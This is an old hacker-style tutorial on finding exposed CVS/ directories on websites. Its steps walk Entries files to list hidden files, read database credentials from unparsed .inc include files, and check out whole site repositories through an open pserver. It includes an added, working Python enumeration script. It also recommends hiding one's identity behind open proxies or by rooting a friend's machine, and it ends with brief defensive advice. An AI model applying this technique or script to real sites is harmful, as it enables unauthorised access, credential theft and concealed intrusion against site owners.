Webhacking with CVS
by methodic (methodic@libpcap.net)
When a project is checked out of the Concurrent Versions System (CVS) repository, CVS creates a CVS/ directory inside every checked-out directory to keep track of the checkout (file names, revision numbers, where the repository lives). Normally this isn't much of an issue, until someone uses CVS to manage web content and the checkout itself becomes the live document root.
How bad this is depends on what's in the tree, but as you'll see below it can go all the way to database credentials.
Let's take imaginary Company XYZ for example. Doing a quick search on Google you are able to find their homepage, say http://xyzinnovations.com.
To check whether they use CVS to manage their website, simply point your browser to http://xyzinnovations.com/CVS. If they're using CVS, one of two things happens: you either get an error saying directory listings are disabled (a 403), or you see a list of files. Which one doesn't matter; what's important is that you now know they use CVS to manage their website content. A 404, on the other hand, means the CVS directories were never there or were stripped before the site went live.
Now on to the fun stuff.
There are three common files found in CVS directories: Entries, Repository, and Root.
The Root file tells you where the CVS repository is located (the CVSROOT string, e.g. a :pserver: address). The Repository file tells you the name of the project (the website content) in the CVS repository. The Entries file is the one we're interested in. It lists every file and subdirectory in that directory of the checkout, one per line: file lines look like /name/revision/timestamp/options/tagdate, directory lines begin with D/. Each subdirectory has its own CVS/Entries, so you walk the tree one directory at a time.
Here's a snippet from the Entries file for libpcap.net:
/patches.phtml/1.1.1.1/Sun Mar 30 15:27:37 2003//
D/gfx////
D/orbs////
/code.phtml/1.4/Sun Mar 30 15:48:00 2003//
/exploits.phtml/1.1.1.1/Sun Mar 30 15:48:04 2003//
/index.phtml/1.2/Sun Mar 30 19:24:37 2003//
D/aimcrack////

As you can see, this file discloses some very valuable information.
Let's go back to our example of Company XYZ. With this information, we point our browser to http://xyzinnovations.com/CVS/Entries. Bingo. Check out what we found:
D/includes////
D/docs////
/robots.txt/1.1/Fri Jun 15 11:52:37 2001//
/docs.php/1.4/Thu Dec 13 10:06:26 2001//
/index.php/1.15/Tue Aug 20 17:51:54 2002//

Pretty interesting stuff.
Company XYZ appears to be using PHP (a scripting language well suited to website development). Also notice the includes directory. Since we know they're using PHP, we can assume that the includes directory contains PHP scripts that the website pulls in when building its pages. If you haven't used PHP at all, one of the most widely used functions in web development is include().
This function pulls another file into your PHP script. That way web developers only have to write something once and can reuse it over and over by just calling: include("/path/to/file")
Common examples of this include site layout (it makes more sense to edit one include file than 15 different static HTML pages), connecting to a database (if each page needs to connect to a database, why write the code 15 different times?), and so on.
So let's check out the includes directory, shall we? Be sure to use the same method; don't just go to http://xyzinnovations.com/includes because we already figured out XYZ's website doesn't allow directory listings. Instead go to this URL: http://xyzinnovations.com/includes/CVS/Entries
You should see something like this:
/connect_db.inc/1.1.1.1/Sun Mar 30 19:21:20 2003//
/header.inc/1.1.1.1/Sun Mar 30 19:21:20 2003//
/footer.inc/1.2/Sun Mar 30 19:56:43 2003//
/close_db.inc/1.3/Mon Mar 31 16:56:22 2003//

Notice the connect_db.inc file.
Logic would tell you that this include file handles opening a connection to a database. Let's check it out. Since this is a file, not a directory, you can just go to: http://xyzinnovations.com/includes/connect_db.inc
Here's the catch that makes this work: the webserver usually only hands .php files to the PHP interpreter, so a .inc file is served back as plain text, source code and all. If this file is what we think it is, you should see something similar to this line in it:

$link = mysql_connect("xyzinnovations.com", "xyz", "xyzzyx");

Congratulations h4x0r... you now know the username and password they use to connect to the company database (xyz and xyzzyx respectively).
From this knowledge the possibilities are endless. How many times have you seen the same login/password used for different services? I've also seen a database server use the same login credentials for the database as it had on the server itself (same username/password).
Just to recap: to find out if a website is using CVS to manage its content, simply go to: http://site.com/CVS
In fact, since we're only really interested in the Entries file (for now), you can go directly to: http://site.com/CVS/Entries
From the output you can tell which lines are files and which are directories (the directory entries begin with a D; a line that is just D on its own carries no name and only marks the end of the directory list).
Using the Entries file, you can then list the files under each directory by going to the same path one level down: http://site.com/some_dir/CVS/Entries
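Here is the recap as a script. This is an added example, not code from the original article: it parses the Entries format, walks the tree directory by directory through each CVS/Entries it can fetch, and builds the cvs checkout command from the Root and Repository files. The fetcher is injected, so it runs offline against a constructed site map for the article's imaginary xyzinnovations.com (the responses below are made up, not real data); http_fetch is the real HTTP version you would swap in against a host you are authorised to test.

```python
"""Enumerate a web tree through exposed CVS/Entries files (added example)."""
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Set, Tuple

ENTRIES_PATH = "CVS/Entries"


def parse_entries(text: str) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Parse one CVS Entries file.

    File lines look like  /name/revision/timestamp/options/tagdate
    directory lines like  D/name////
    A bare "D" line only says the subdirectory list is complete; skip it.
    Returns ([(filename, revision), ...], [dirname, ...]) in file order.
    """
    files: List[Tuple[str, str]] = []
    dirs: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "D":
            continue
        parts = line.split("/")  # parts[0] is "" for files, "D" for dirs
        if len(parts) < 3 or not parts[1]:
            continue  # malformed line: ignore it rather than abort the walk
        if parts[0] == "D":
            dirs.append(parts[1])
        else:
            files.append((parts[1], parts[2]))
    return files, dirs


def walk(base_url: str, fetch: Callable[[str], Optional[str]],
         max_depth: int = 8) -> List[str]:
    """Depth-first walk: fetch <dir>/CVS/Entries, record files, recurse into dirs."""
    found: List[str] = []
    seen: Set[str] = set()

    def visit(prefix: str, depth: int) -> None:
        if depth > max_depth or prefix in seen:
            return
        seen.add(prefix)
        body = fetch(prefix + ENTRIES_PATH)
        if body is None:  # no Entries exposed here (403/404/error): stop this branch
            return
        files, dirs = parse_entries(body)
        for name, _rev in files:
            found.append(prefix + name)
        for d in dirs:
            visit(prefix + d + "/", depth + 1)

    visit(base_url.rstrip("/") + "/", 0)
    return found


def checkout_command(root: str, repository: str) -> List[str]:
    """argv for a checkout: Root file contents are the CVSROOT (-d), Repository the module."""
    return ["cvs", "-d", root.strip(), "checkout", repository.strip()]


def http_fetch(url: str, timeout: float = 10.0) -> Optional[str]:
    """Real fetcher; returns None on any HTTP or network error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except (urllib.error.URLError, OSError):
        return None


# Constructed stand-in for HTTP responses from the article's imaginary host.
FAKE_SITE: Dict[str, str] = {
    "http://xyzinnovations.com/CVS/Entries": (
        "D/includes////\nD/docs////\n"
        "/robots.txt/1.1/Fri Jun 15 11:52:37 2001//\n"
        "/index.php/1.15/Tue Aug 20 17:51:54 2002//\nD\n"
    ),
    "http://xyzinnovations.com/includes/CVS/Entries": (
        "/connect_db.inc/1.1.1.1/Sun Mar 30 19:21:20 2003//\n"
        "/header.inc/1.1.1.1/Sun Mar 30 19:21:20 2003//\n"
    ),
    # docs/ deliberately has no Entries exposed, so the walk stops there.
}


def fake_fetch(url: str) -> Optional[str]:
    return FAKE_SITE.get(url)


def example() -> List[str]:
    return walk("http://xyzinnovations.com", fake_fetch)


if __name__ == "__main__":
    for url in example():
        print(url)
    # Hypothetical Root/Repository contents, just to show the command shape.
    print(" ".join(checkout_command(":pserver:anonymous@xyzinnovations.com:/cvsroot", "www")))
```

The walk stops at any directory whose Entries file is not served, so a site that strips only the top-level CVS/ directory still gives up every subdirectory you can reach by guessing one path.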
Last but not least, know what to look for. I've seen it all: include files, shell scripts, ZIP files of the site itself, PHP and CGI scripts with a -sav or -orig extension (the webserver won't parse those, so they come back as source).
Another thing you can try is to see if their CVS server (pserver) is reachable from the outside; it usually runs on port 2401. If you find one open to you, grab the Root file (its contents are the CVSROOT string you pass to cvs with -d) and the Repository file (the module to check out), and try a cvs checkout of that module. Yes, I've been able to CVS over an entire website, .htpasswd and all.
If you're a newbie to CVS, I highly suggest installing CVS and checking out this URL: cvsbook.red-bean.com/cvsbook.html
Webhacking with CVS files isn't a well-known technique, but it certainly is one of the most effective. Not only can you retrieve files off a server that tries to hide them by turning directory listings off or dropping an index.html into the directory, but there are multiple ways to hide your true identity.
Grab an open WinGate proxy, put the IP address in Mozilla, and go to town. Or just r00t your friend's Red Hat 7.3 box and use lynx --source.
I hope both sides of the fence learned a thing or two about the dangers of using CVS to manage websites. CVS is a very powerful tool to manage projects, no doubt about it; just be aware of what it leaves behind and, more importantly, who's there to take it. If you're on the defending side: publish with cvs export (which writes no CVS/ directories) instead of checking out straight into the document root, or delete the CVS/ directories from the live tree, and configure the webserver to refuse requests for CVS/ and for .inc files it isn't going to parse.
Shout0uts: dmuz and the rest of the ap crew. congrats to victim1 on getting the 31336++ jobby, good luck in md. http://libpcap.net like woah.